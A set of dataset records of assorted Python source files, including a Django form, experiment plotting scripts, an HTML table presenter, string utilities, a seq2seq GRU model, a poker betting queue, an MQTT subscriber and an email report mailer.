forms.SelectMultiple(attrs={'class': 'form-control'})\n \n }\n\n def clean_slug(self):\n new_slug = self.cleaned_data['slug'].lower() # self.cleaned_data.get('slug')\n #фильтрация слов которые нельза импортировать в бд - систнемные слова\n #например слово пути маршрута 'create'\n if new_slug == 'create':\n raise ValidationError('Slug may not be \"Create\"')\n #здесь не делаем проверку на уникальность, так\n #так как позже сделаем чтобы слаг генерировался \n #уникальным автоматически\n #if Tag.objects.filter(slug__iexact=new_slug).count():\n # raise ValidationError('Slug must be unique. We have \"{}\" slug already'.format(new_slug))\n return new_slug\n\n","sub_path":"app/blogengine/blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"507949384","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nlog_dir_main = '../logs/final_combined_toy_example_invertibleTP_save/'\nlog_dir_save = '../logs/final_combined_toy_example_unequal_layers_save/'\nmax_epoch = 60\n\nindices = [0,1,2,4,5,6,7,8,9,10,11,12,13,14]\n\n# ====== load results =======\ntrain_losses_TP = np.load(log_dir_main + 'train_losses_TP.npy')\ntest_losses_TP = np.load(log_dir_main + 'test_losses_TP.npy')\napprox_error_angles_array_TP=np.load(log_dir_main + 'approx_error_angles_array_TP.npy')\napprox_errors_array_TP=np.load(log_dir_main + 'approx_errors_array_TP.npy')\n\ntrain_losses_TPrandom=np.load(log_dir_main + 'train_losses_TPrandom.npy')\ntest_losses_TPrandom=np.load(log_dir_main + 'test_losses_TPrandom.npy')\napprox_error_angles_array_TPrandom=np.load(log_dir_main + 'approx_error_angles_array_TPrandom.npy')\napprox_errors_array_TPrandom=np.load(log_dir_main + 'approx_errors_array_TPrandom.npy')\n\ntrain_losses_MTP=np.load(log_dir_main + 'train_losses_MTP.npy')\ntest_losses_MTP=np.load(log_dir_main + 'test_losses_MTP.npy')\napprox_error_angles_array_MTP=np.load(log_dir_main + 'approx_error_angles_array_MTP.npy')\napprox_errors_array_MTP=np.load(log_dir_main + 'approx_errors_array_MTP.npy')\n\ntrain_losses_BP=np.load(log_dir_main + 'train_losses_BP.npy')\ntest_losses_BP=np.load(log_dir_main + 'test_losses_BP.npy')\n\ntrain_losses_BP_fixed=np.load(log_dir_main + 'train_losses_BP_fixed.npy')\ntest_losses_BP_fixed=np.load(log_dir_main + 'test_losses_BP_fixed.npy')\n\n# train_losses_TP = train_losses_TP[indices,:]\n# test_losses_TP=test_losses_TP[indices,:]\n# approx_error_angles_array_TP=approx_error_angles_array_TP[indices,:]\n# approx_errors_array_TP=approx_errors_array_TP[indices,:]\n#\n# train_losses_TPrandom=train_losses_TPrandom[indices,:]\n# test_losses_TPrandom=test_losses_TPrandom[indices,:]\n# approx_error_angles_array_TPrandom=approx_error_angles_array_TPrandom[indices,:]\n# approx_errors_array_TPrandom=approx_errors_array_TPrandom[indices,:]\n#\n# train_losses_MTP=train_losses_MTP[indices,:]\n# test_losses_MTP=test_losses_MTP[indices,:]\n# approx_error_angles_array_MTP=approx_error_angles_array_MTP[indices,:]\n# approx_errors_array_MTP=approx_errors_array_MTP[indices,:]\n#\n# train_losses_BP=train_losses_BP[indices,:]\n# test_losses_BP=test_losses_BP[indices,:]\n#\n# train_losses_BP_fixed=train_losses_BP_fixed[indices,:]\n# test_losses_BP_fixed=test_losses_BP_fixed[indices,:]\n\n\n# # ====== Save results =======\n# np.save(log_dir_save + 'train_losses_TP.npy', train_losses_TP)\n# np.save(log_dir_save + 'test_losses_TP.npy', test_losses_TP)\n# np.save(log_dir_save + 'approx_error_angles_array_TP.npy', approx_error_angles_array_TP)\n# np.save(log_dir_save + 'approx_errors_array_TP.npy', approx_errors_array_TP)\n#\n# np.save(log_dir_save + 'train_losses_TPrandom.npy', train_losses_TPrandom)\n# np.save(log_dir_save + 'test_losses_TPrandom.npy', test_losses_TPrandom)\n# np.save(log_dir_save + 'approx_error_angles_array_TPrandom.npy', approx_error_angles_array_TPrandom)\n# np.save(log_dir_save + 'approx_errors_array_TPrandom.npy', approx_errors_array_TPrandom)\n#\n# np.save(log_dir_save + 'train_losses_MTP.npy', train_losses_MTP)\n# np.save(log_dir_save + 'test_losses_MTP.npy', test_losses_MTP)\n# np.save(log_dir_save + 'approx_error_angles_array_MTP.npy', approx_error_angles_array_MTP)\n# np.save(log_dir_save + 'approx_errors_array_MTP.npy', approx_errors_array_MTP)\n#\n# np.save(log_dir_save + 'train_losses_BP.npy', train_losses_BP)\n# np.save(log_dir_save + 'test_losses_BP.npy', test_losses_BP)\n#\n# np.save(log_dir_save + 'train_losses_BP_fixed.npy', train_losses_BP_fixed)\n# np.save(log_dir_save + 'test_losses_BP_fixed.npy', test_losses_BP_fixed)\n\n# ========= Average results ==========\ntrain_loss_TP_mean = np.mean(train_losses_TP, axis=0)\ntest_loss_TP_mean = np.mean(test_losses_TP, axis=0)\napprox_errors_TP_mean = np.mean(approx_errors_array_TP, axis=0)\napprox_error_angle_TP_mean = np.mean(approx_error_angles_array_TP, axis=0)\n\ntrain_loss_TPrandom_mean = np.mean(train_losses_TPrandom, axis=0)\ntest_loss_TPrandom_mean = np.mean(test_losses_TPrandom, axis=0)\napprox_errors_TPrandom_mean = np.mean(approx_errors_array_TPrandom, axis=0)\napprox_error_angle_TPrandom_mean = np.mean(approx_error_angles_array_TPrandom, axis=0)\n\ntrain_loss_MTP_mean = np.mean(train_losses_MTP, axis=0)\ntest_loss_MTP_mean = np.mean(test_losses_MTP, axis=0)\napprox_errors_MTP_mean = np.mean(approx_errors_array_MTP, axis=0)\napprox_error_angle_MTP_mean = np.mean(approx_error_angles_array_MTP, axis=0)\n\ntrain_loss_BP_mean = np.mean(train_losses_BP, axis=0)\ntest_loss_BP_mean = np.mean(test_losses_BP, axis=0)\n\ntrain_loss_fixed_BP_mean = np.mean(train_losses_BP_fixed, axis=0)\ntest_loss_fixed_BP_mean = np.mean(test_losses_BP_fixed, axis=0)\n\n\n# ========== Smooth results =========\ndef smooth(y, box_pts=8):\n box = np.ones(box_pts)/box_pts\n y_smooth = np.convolve(y, box, mode='valid')\n return y_smooth\n\napprox_errors_MTP_mean = smooth(approx_errors_MTP_mean)\napprox_error_angle_MTP_mean = smooth(approx_error_angle_MTP_mean)\napprox_errors_TP_mean = smooth(approx_errors_TP_mean)\napprox_error_angle_TP_mean = smooth(approx_error_angle_TP_mean)\napprox_errors_TPrandom_mean = smooth(approx_errors_TPrandom_mean)\napprox_error_angle_TPrandom_mean = smooth(approx_error_angle_TPrandom_mean)\n\n\n\n# ========= PLOTS ===========\nfontsize = 14\nepochs = np.arange(0, max_epoch+1)\nlegend1 = ['TP-EI', 'RTP-EI', 'RMTP-EI', 'BP', 'BP-fixed']\nlegend2 = ['TP-EI', 'RTP-EI', 'RMTP-EI']\n# Set plot style\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\n\nfig = plt.figure('training_loss')\nax = fig.add_subplot(1, 1, 1)\nax.tick_params(axis='both', which='major', labelsize=fontsize)\nplt.semilogy(epochs, train_loss_TP_mean)\nplt.semilogy(epochs, train_loss_TPrandom_mean)\nplt.semilogy(epochs, train_loss_MTP_mean)\nplt.semilogy(epochs, train_loss_BP_mean)\nplt.semilogy(epochs, train_loss_fixed_BP_mean)\nplt.xlabel(r'epoch', fontsize=fontsize)\nplt.ylabel(r'MSE loss', fontsize=fontsize)\nplt.legend(legend1, fontsize=fontsize)\nplt.show()\n\nfig = plt.figure('test_loss')\nax = fig.add_subplot(1, 1, 1)\nax.tick_params(axis='both', which='major', labelsize=fontsize)\nplt.semilogy(epochs, test_loss_TP_mean)\nplt.semilogy(epochs, test_loss_TPrandom_mean)\nplt.semilogy(epochs, test_loss_MTP_mean)\nplt.semilogy(epochs, test_loss_BP_mean)\nplt.semilogy(epochs, test_loss_fixed_BP_mean)\nplt.xlabel(r'epoch', fontsize=fontsize)\nplt.ylabel(r'MSE loss', fontsize=fontsize)\nplt.legend(legend1, fontsize=fontsize)\nplt.show()\n\nfig = plt.figure('approx_error_angles')\nax = fig.add_subplot(1, 1, 1)\nax.tick_params(axis='both', which='major', labelsize=fontsize)\nplt.plot(approx_error_angle_TP_mean)\nplt.plot(approx_error_angle_TPrandom_mean)\nplt.plot(approx_error_angle_MTP_mean)\nplt.xlabel(r'mini-batch', fontsize=fontsize)\nplt.ylabel(r'$\\cos(\\alpha)$', fontsize=fontsize)\nplt.legend(legend2, fontsize=fontsize)\nplt.show()\n\nfig = plt.figure('approx_errors')\nax = fig.add_subplot(1, 1, 1)\nax.tick_params(axis='both', which='major', labelsize=fontsize)\nplt.semilogy(approx_errors_TP_mean)\nplt.semilogy(approx_errors_TPrandom_mean)\nplt.semilogy(approx_errors_MTP_mean)\nplt.xlabel(r'mini-batch', fontsize=fontsize)\nplt.ylabel(r'$\\|e^{approx}\\|_2$', fontsize=fontsize)\nplt.legend(legend2, fontsize=fontsize, loc='upper right')\nplt.show()\n","sub_path":"utils/plot_combined_toyexample.py","file_name":"plot_combined_toyexample.py","file_ext":"py","file_size_in_byte":7309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"417259435","text":"\nclass Presenter:\n def __init__(self, model):\n self.model = model\n\n self.matches_columns = ['Дата', 'Турнир', 'Игрок1', 'Игрок2', 'Счет', 'Источники', 'БК', 'Хеш']\n self.matches_dtypes = ['string'] * 8\n\n self.competitions_columns = ['Дата', 'Название', 'Игроки', 'Матчи', 'Источники']\n self.competitions_dtypes = ['string'] * 2 + ['number'] * 2 + ['string']\n\n self.bets_columns = ['Дата', 'Турнир', 'id1', 'id2', 'Счет', 'К1', 'К2', 'Тотал', 'Б', 'М']\n self.bets_dtypes = ['string'] * 10\n\n self.players_columns = ['id', 'Игрок', 'LP', 'Матчи']\n self.players_dtypes = ['string'] * 3 + ['number']\n\n self.player_rankings_columns = ['Дата', 'Источник', 'Рейтинг', 'Ранг']\n self.player_rankings_dtypes = ['string'] * 2 + ['number'] * 2\n\n self.rankings_columns = ['#', 'id', 'Игрок'] + [e[0] for e in self.model.rankingSources]\n self.rankings_dtypes = ['number'] + ['string'] * 2 + ['number'] * len(self.model.rankingSources)\n\n\n def getHref(self, playerId, playerName, filterFlag=False):\n if (playerId is not None) and playerId != '':\n hr = '' + str(playerName) + ''\n if filterFlag:\n return '' + hr\n else:\n return hr\n return str(playerName)\n\n def getCompHref0(self, id, name):\n return '' + name + ''\n\n def getCompHref(self, compId, name):\n if compId is not None:\n return '' + \\\n '' + \\\n '' + name + ''\n return name\n\n def getSourceHref(self, name):\n# return '' + '' + \\\n# '' + name + ''\n return '' + \\\n '' + name\n\n def getPlayersHrefsByIds(self, ids, filterFlag=False):\n return ' - '.join([self.getHref(e, self.model.playersDict.getName(e, fl=1), filterFlag=filterFlag) for e in ids])\n\n def getPlayersHrefsByIdsNames(self, ids, names, filterFlag=False):\n arr = []\n for e1, e2 in zip(ids, names):\n name = self.model.playersDict.getName(e1, fl=1)\n playerId = e1\n if name is None:\n name = e2\n playerId = None\n arr.append(self.getHref(playerId, name, filterFlag=filterFlag))\n return ' - '.join(arr)\n\n def getPlayersIdsHrefs(self, players, ids, filterFlag=False):\n arr = []\n for playerName, playerId in zip(players, ids):\n if playerId == '' or playerId.find(',') != -1:\n arr.append(playerName)\n else:\n arr.append(self.getHref(playerId, playerName))\n return ' - '.join(arr)\n\n def getLiveBetsTable(self):\n data = []\n for key, matchBet in sorted(self.model.betsStorage.liveBets.items(), key=lambda x: x[1].dt, reverse=1):\n names1 = self.getPlayersIdsHrefs(matchBet.names[0], matchBet.ids[0])\n names2 = self.getPlayersIdsHrefs(matchBet.names[1], matchBet.ids[1])\n info = '
'.join([str((k, v)) for k, v in sorted(matchBet.eventsInfo[-1][1].items(),\n key=lambda x: '0' if x[0] == 'match' else x[0][0])])\n data.append([matchBet.dt, matchBet.eventsInfo[-1][0],\n matchBet.eventId, matchBet.compName, str(matchBet.extraInfo),\n names1, names2, matchBet.getLastScore(),\n info, matchBet.getKey()])\n return data\n\n def getBetsTable(self):\n data = []\n for mKey, matchBet in sorted(self.model.betsStorage.bets.items(), key=lambda x: x[1].dt, reverse=1):\n if mKey[0] != 'l':\n names1 = self.getPlayersIdsHrefs(matchBet.names[0], matchBet.ids[0])\n names2 = self.getPlayersIdsHrefs(matchBet.names[1], matchBet.ids[1])\n data.append([matchBet.dt, matchBet.eventsInfo[-1][0],\n matchBet.eventId, matchBet.compName, str(matchBet.extraInfo),\n names1, names2, matchBet.getLastScore(),\n mKey])\n return data\n\n def getMatchesTable(self, matches, filterFlag=False):\n data = []\n for i, match in enumerate(matches):\n names1 = self.getPlayersHrefsByIdsNames(match.ids[0], match.names[0], filterFlag=filterFlag)\n names2 = self.getPlayersHrefsByIdsNames(match.ids[1], match.names[1], filterFlag=filterFlag)\n flBet = '+' if match.hash in self.model.betsStorage.bets else ''\n data.append([match.date + ', ' + (match.time if match.time else '-'), self.getCompHref(match.compId, match.compName),\n names1, names2, match.setsScore + ', (' + match.pointsScore + ')',\n '; '.join([self.getSourceHref(e) for e in match.sources]), flBet, match.hash])\n return data\n\n def getMatchBetsTable(self, matchHash):\n data = []\n matchBet = self.model.betsStorage.getBet(matchHash)\n if matchBet is None:\n return data\n if matchHash[0] != 'l':\n left, right, step = 0, len(matchBet.eventsInfo), 1\n else:\n left, right, step = len(matchBet.eventsInfo)-1, -1, -1\n\n id1 = ' - '.join(matchBet.names[0])\n id2 = ' - '.join(matchBet.names[1])\n dt = matchBet.dt\n match = self.model.getMatch(matchHash)\n if match is not None:\n dt = min(dt, match.date + ' ' + (match.time if match.time else ''))\n for i in range(left, right, step):\n try:\n mb = matchBet.eventsInfo[i][1].get('match', dict())\n pWin = self.model.predict(matchBet, dt, score=mb.get('score', None), betInfo=mb)\n\n except Exception as ex:\n print(ex)\n print(matchBet.eventsInfo[i])\n raise\n\n data.append([matchBet.eventsInfo[i][0][:10] + ', ' + matchBet.eventsInfo[i][0][11:],\n matchBet.compName, id1, id2,\n mb.get('score', ''),\n str(mb.get('win1', '')) + str(pWin), mb.get('win2', ''),\n mb.get('total_g', [''])[0], mb.get('total_g', [''])[1:3], mb.get('total_l', [''])[1:3]])\n\n return data\n\n def getPlayersTable(self, players):\n data = []\n for player in players:\n href = player.hrefs.get('liga_pro', '')\n if href != '':\n href = '' + href + ''\n data.append([player.id,\n self.getHref(player.id, player.name),\n href,\n len(player.matches)])\n return data\n\n def getCompetitionsTable(self, competitions):\n data = []\n for comp in competitions:\n data.append([comp.finishDate, self.getCompHref0(comp.id, comp.name),\n str(len(comp.playersSet)), str(len(comp.matches)),\n '; '.join([self.getSourceHref(e) for e in comp.sources])])\n return data\n","sub_path":"ttstat/presenter.py","file_name":"presenter.py","file_ext":"py","file_size_in_byte":7867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"627145726","text":"# Без использования методов строк, напишите реализацию таких методов строк:\n# replace, split, find. Напишите функцию remove по индексу и по подстроке.\n\n\ndef remove_by_index(string, index):\n return string[:index] + string[index+1:]\n\n\ndef remove_by_substring(string, substring, maximum=0):\n return my_replace(string, substring, '', maximum)\n\n\ndef my_replace(string, old, new, maximum=0):\n len_string = len(string)\n x = 0\n result = ''\n max_counter = 0\n while x < len_string:\n if maximum and max_counter == maximum:\n result += string[x:]\n break\n y = my_find(string[x:], old)\n if y >= 0:\n result += string[x: y]\n result += new\n x += y\n x += len(old)\n else:\n result += string[x:]\n break\n max_counter += 1\n return result\n\n\ndef my_split(string, separator=' ', maximum=-1):\n result = []\n len_string = len(string)\n len_sep = len(separator)\n if len_string == 0:\n return None\n if maximum == 0:\n result.append(string)\n return result\n\n separators_array = []\n x = 0\n while x < len_string:\n if maximum > 0 and maximum == len(separators_array):\n separators_array.append(len_string)\n break\n y = my_find(string[x:], separator)\n if y >= 0:\n x += y\n separators_array.append(x)\n x += len_sep\n\n else:\n separators_array.append(len_string)\n break\n\n for i in range(len(separators_array) - 1):\n if i == 0:\n result.append(string[:separators_array[i]])\n combo = string[separators_array[i] + len_sep: separators_array[i + 1]]\n result.append(combo)\n return result\n\n\ndef my_find(string, value, start=0, end=0):\n string_counter = 0\n end, start = max(start, end), min(start, end)\n if start and start <= len(string):\n string = string[:start]\n if end and (end - start) <= len(string):\n string = string[end - start:]\n len_string = len(string)\n len_value = len(value)\n if len_value > len_string:\n return -1\n while string_counter <= len_string - len_value:\n if string[string_counter:string_counter + len_value] == value:\n return string_counter\n string_counter += 1\n return -1\n\n\nif __name__ == \"__main__\":\n my_string = 'pip is a Python package installer, recommended ' \\\n 'for installing Python packages which are not available '\n print(my_split(my_string))\n print(my_replace(my_string, 'Python', 'PYTHON'))\n print(remove_by_index(my_string, 4))\n print(remove_by_substring(my_string, 'Python'))\n","sub_path":"lesson_4/replace_find_split.py","file_name":"replace_find_split.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"209530132","text":"import torch, torch.nn as nn\nimport torch.nn.functional as F\n\nfrom fastai.core import V\n\ndef create_emb(vecs, itos, em_sz):\n emb = nn.Embedding(len(itos), em_sz, padding_idx=1)\n wgts = emb.weight.data\n miss = []\n #itos = ID of a token to token name\n for i,w in enumerate(itos):\n try: wgts[i] = torch.from_numpy(vecs[w]*3)\n except: miss.append(w)\n #count how many token's embeddings where missed \n print(len(miss),miss[5:10])\n return emb\n\nclass Seq2SeqRNN_Bidir(nn.Module):\n def __init__(self, vecs_enc, itos_enc, em_sz_enc, vecs_dec, itos_dec, em_sz_dec, nh, out_sl, nl=2):\n super().__init__()\n #vecs_enc = enconding vector\n #itos_enc = for conversion of tokens Id in encoder to their corresponding word\n #em_sz_enc = embedding size of the encoder\n #vecs_dec = decoders vector\n #itos_dec = for conversion of tokens Id in decoder to their corresponding word\n #em_sz_dec = embedding size of the decoder\n #nh = number of hidden layer\n #out_sl = length of longest method name\n #nl = number of inner layer\n self.emb_enc = create_emb(vecs_enc, itos_enc, em_sz_enc)\n self.nl, self.nh, self.out_sl = nl, nh, out_sl\n #setting bidirectional = true\n self.gru_enc = nn.GRU(em_sz_enc, nh, num_layers=nl, dropout=0.25, bidirectional=True)\n self.out_enc = nn.Linear(nh * 2, em_sz_dec, bias=False)\n self.drop_enc = nn.Dropout(0.05)\n self.emb_dec = create_emb(vecs_dec, itos_dec, em_sz_dec)\n self.gru_dec = nn.GRU(em_sz_dec, em_sz_dec, num_layers=nl, dropout=0.1)\n self.emb_enc_drop = nn.Dropout(0.15)\n self.out_drop = nn.Dropout(0.35)\n self.out = nn.Linear(em_sz_dec, len(itos_dec))\n self.out.weight.data = self.emb_dec.weight.data\n\n def forward(self, inp):\n sl, bs = inp.size()\n #sl= sequence length, bs= batch size\n h = self.initHidden(bs)\n emb = self.emb_enc_drop(self.emb_enc(inp))\n enc_out, h = self.gru_enc(emb, h)\n h = h.view(2, 2, bs, -1).permute(0, 2, 1, 3).contiguous().view(2, bs, -1)\n h = self.out_enc(self.drop_enc(h))\n # h = hidden state obtained from the encoder\n dec_inp = V(torch.zeros(bs).long())\n res = []\n #decoder impl\n for i in range(self.out_sl):\n emb = self.emb_dec(dec_inp).unsqueeze(0)\n outp, h = self.gru_dec(emb, h)\n outp = self.out(self.out_drop(outp[0]))\n res.append(outp)\n dec_inp = V(outp.data.max(1)[1])\n if (dec_inp == 1).all(): break\n return torch.stack(res)\n\n def initHidden(self, bs):\n return V(torch.zeros(self.nl * 2, bs, self.nh))","sub_path":"Seq2SeqRNN_Bidirectional.py","file_name":"Seq2SeqRNN_Bidirectional.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"207303823","text":"from websocket import create_connection\n\n\ndef test():\n ws = create_connection(\"ws://echo.websocket.org/\")\n print(\"Sending 'Hello, World'...\")\n ws.send(\"Hello, World\")\n print(\"Sent\")\n print(\"Receiving...\")\n result = ws.recv()\n print(\"Received '%s'\" % result)\n ws.close()\n\n\nif __name__ == '__main__':\n test()\n","sub_path":"src/websocket/demo/websocketdemo.py","file_name":"websocketdemo.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"640530858","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.8 (3413)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: D:\\dev\\cocos2020\\test\\test_draw.py\n# Compiled at: 2020-01-10 23:58:31\n# Size of source mod 2**32: 1306 bytes\nfrom __future__ import division, print_function, unicode_literals\nimport sys, os\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))\ntestinfo = 't 0.1, s, q'\ntags = 'Canvas, line_to'\nimport cocos\nimport cocos.director as director\nfrom cocos import draw\nimport pyglet, random\nri = random.randint\n\nclass TestFigure(draw.Canvas):\n\n def render(self):\n x, y = director.get_window_size()\n for i in range(100):\n start = (\n ri(0, 640), ri(0, 480))\n end = (ri(0, 640), ri(0, 480))\n color = (ri(0, 255), ri(0, 255), ri(0, 255), ri(0, 255))\n width = ri(1, 20)\n if random.random() < 0.3:\n self.set_color(color)\n self.set_stroke_width(width)\n self.move_to(start)\n self.line_to(end)\n\n\nclass TestLayer(cocos.layer.Layer):\n\n def __init__(self):\n super(TestLayer, self).__init__()\n self.add(TestFigure())\n self.schedule(lambda x: 0)\n\n\ndef main():\n director.init()\n test_layer = TestLayer()\n main_scene = cocos.scene.Scene(test_layer)\n director.run(main_scene)\n\n\nif __name__ == '__main__':\n main()","sub_path":"pycfiles/cocos2d-0.6.8.tar/test_draw.cpython-38.py","file_name":"test_draw.cpython-38.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"499095825","text":"from willow.willow import *\n\ndef session(me):\n add(\"

Please enter your name.\")\n add(\"\")\n add(\"\")\n take({\"tag\": \"click\", \"id\": \"go\", \"client\": me})\n name = peek(\"#name\")\n add(\"

Hello, %s.\" % name)\n\nrun(session) \n","sub_path":"lesson05.py","file_name":"lesson05.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"107449743","text":"from enum import IntEnum\nimport itertools as it\n\nclass BetEnded(Exception): pass\nclass LastPlayerLeft(Exception): pass\n\nclass Move(IntEnum):\n BLIND = 0\n FOLD = 2\n CHECK = 3\n BET = 4\n CALL = 5\n RAISE = 6\n QUIT = 7\n\nclass CommunityData:\n def __init__(self, limit :int) -> None:\n self.communityCards = []\n self.limit = limit\n self.actions = [[]]\n self.maxPot = 0\n \n def getNumOfBlinds(self) -> int: #tuple 'cause its faster than list()\n return len(tuple(filter(lambda x: x[1] == Move.BLIND, self.actions[0])))\n\nclass BetQueue:\n def __init__(self, limit :int, players :list) -> None:\n self.__initAfterFoldAndCommData(limit)\n self.waiting = players #players who do not bet yet\n\n def __initAfterFoldAndCommData(self, limit):\n self.communityData = CommunityData(limit)\n self.after = [] #players who are after their bets\n self.fold = [] #players who folded\n\n def reset(self, limit :int):\n self.waiting.extend(self.after + self.fold)\n self.__initAfterFoldAndCommData(limit)\n for player in self.waiting:\n idx = player.dealerIdx - 1\n player.dealerIdx = idx if idx > -1 else len(self.waiting) - 1\n player.clearHandAndPot()\n\n self.waiting.sort(key=lambda x: x.dealerIdx)\n\n def blindLoop(self) -> None:\n self.__loop(lambda x, y : y.getNumOfBlinds() < 2)\n\n def betLoop(self) -> None:\n self.__loop(lambda x, y: len(x) > 0)\n\n self.waiting.extend(self.after)\n self.waiting.sort(key=lambda x: x.dealerIdx)\n self.after.clear()\n self.communityData.actions.append([])\n\n def extendCommCards(self, cards):\n self.communityData.communityCards.extend(cards)\n\n def getBankroll(self):\n return sum(map(lambda x: x[2], list(it.chain(*self.communityData.actions))))\n\n def __loop(self, statement) -> None:\n while statement(self.waiting, self.communityData):\n player = self.waiting.pop(0)\n move = player.bet(self.communityData)\n \n if move in [Move.RAISE, Move.BET, Move.BLIND]: #raising moves\n self.waiting.extend(self.after)\n self.after = [player]\n self.communityData.maxPot = player.inPot\n elif move == Move.FOLD:\n self.fold.append(player)\n elif move != Move.QUIT:\n self.after.append(player)\n \n if len(self.allPlayers()) < 2: raise LastPlayerLeft()\n if len(self.getNonFoldingPlayers()) < 2:raise BetEnded()\n\n def getCommCards(self): return self.communityData.communityCards\n def allPlayers(self): return self.waiting + self.after + self.fold\n def getNonFoldingPlayers(self) -> list: return self.waiting + self.after","sub_path":"pyker/betQueue.py","file_name":"betQueue.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"634141273","text":"# *********************************************************************\n# Version: 2016.09.06\n# Author: Archer Huang\n# License: MIT\n# Description: Linkit Smart 7688 Duo + Arduino Code + Bridge + MCS\n# *********************************************************************\n# \n# 1. update opkg & install wget & disable bridge\n# \t opkg update\n# \t opkg install wget\n# \t uci set yunbridge.config.disabled=0\n# \t uci commit\n#\n# 2. install httplib\n#\t pip install paho-mqtt\n#\n# *********************************************************************\n\nimport paho.mqtt.client as mqtt\nimport re\nimport httplib, urllib\nimport socket\nimport sys\nimport time\n\ndeviceId = \"D7fDOASh\"\ndeviceKey = \"eqGDzbxWsKyJqkl7\"\nMQTT_SERVER = \"mqtt.mcs.mediatek.com\"\nMQTT_PORT = 1883\nMQTT_ALIVE = 60\nMQTT_TOPIC = \"mcs/\" + deviceId + \"/\" + deviceKey + \"/+\"\n\ndef on_connect(client, userdata, flags, rc):\n print(\"MQTT Connected with result code \"+str(rc))\n client.subscribe(MQTT_TOPIC)\n\ndef on_message(client, userdata, msg):\n print(\"mqtt payload=%s\" %(msg.payload))\n\nmqtt_client = mqtt.Client()\nmqtt_client.on_connect = on_connect\nmqtt_client.on_message = on_message\n\nmqtt_client.connect(MQTT_SERVER, MQTT_PORT, MQTT_ALIVE)\nmqtt_client.loop_forever()","sub_path":"Python/get_data_from_mcs_mqtt.py","file_name":"get_data_from_mcs_mqtt.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"76714189","text":"import smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email import encoders\n\n\nclass Mailer:\n def __init__(self, config):\n self.fromaddr = config.fromaddr #'no.place.like.co@gmail.com'\n self.toaddr = config.toaddr #'shravan007.c@gmail.com'\n self.msg = MIMEMultipart()\n self.msg['From'] = self.fromaddr\n self.msg['To'] = self.toaddr\n self.msg['Subject'] = 'EZ Living Report'\n self.body = 'Sample Body'\n\n self.filename = config.report_file.split('/')[-1]\n self.filepath = config.report_file\n self.emails = config.emails\n\n attachment = open(self.filepath, 'rb')\n\n self.p = MIMEBase('application', 'octet-stream')\n self.p.set_payload((attachment).read())\n encoders.encode_base64(self.p)\n\n self.p.add_header('Content-Disposition', f\"attachment; filename= {self.filename.split('/')[-1]}\")\n\n self.msg.attach(self.p)\n\n self.s = smtplib.SMTP('smtp.gmail.com', 587)\n\n self.s.starttls()\n self.s.login(self.fromaddr, config.password)\n\n self.text = self.msg.as_string()\n\n\n def deliver(self):\n\n for email in self.emails:\n self.s.sendmail(self.fromaddr, email, self.text)\n\n\n #self.s.sendmail(self.fromaddr, self.toaddr, self.text)\n #self.s.quit()\n\n","sub_path":"cronjob/lib/mailer.py","file_name":"mailer.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"104472819","text":"import argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('infile')\nargs = parser.parse_args()\n\n\ndef sheep(n): \n d = {}\n unseen = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0']\n i = 1\n while True:\n N = str(n * i)\n for u in unseen[:]:\n if u in N:\n unseen.remove(u)\n if unseen == []:\n return i * n\n else:\n i += 1\n\n\nwith open(args.infile, 'r') as infile:\n infile.readline()\n j = 1\n for line in infile:\n n = int(line)\n if n == 0:\n answer = \"INSOMNIA\"\n else:\n answer = sheep(n)\n print(\"Case #%s: %s\" % (j, answer))\n j += 1\n","sub_path":"solutions_5652388522229760_1/Python/gearfo/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"376234410","text":"# coding:utf-8\nimport fileinput\nimport csv\nimport sys\n\n\ndef is_insert_statement(line):\n return line.startswith('INSERT INTO') or False\n\n\ndef parse_values(line):\n values = line.partition('` VALUES ')[2][1:-3].split('),(')\n if len(values) == 0:\n return\n\n reader = csv.reader(\n values,\n delimiter=',',\n doublequote=False,\n escapechar='\\\\',\n quotechar=\"'\",\n strict=True)\n for row in reader:\n if len(row) == 0:\n continue\n sys.stdout.write('\\t'.join(row) + '\\n')\n\n\nif __name__ == '__main__':\n try:\n for line in fileinput.input():\n if is_insert_statement(line):\n parse_values(line)\n except KeyboardInterrupt:\n sys.exit(0)\n","sub_path":"dump2tsv.py","file_name":"dump2tsv.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"548269610","text":"from transformers import RobertaModel\nimport torch\nfrom torch import nn\nfrom regr.program.model.primaldual import PrimalDualModel\n\nclass 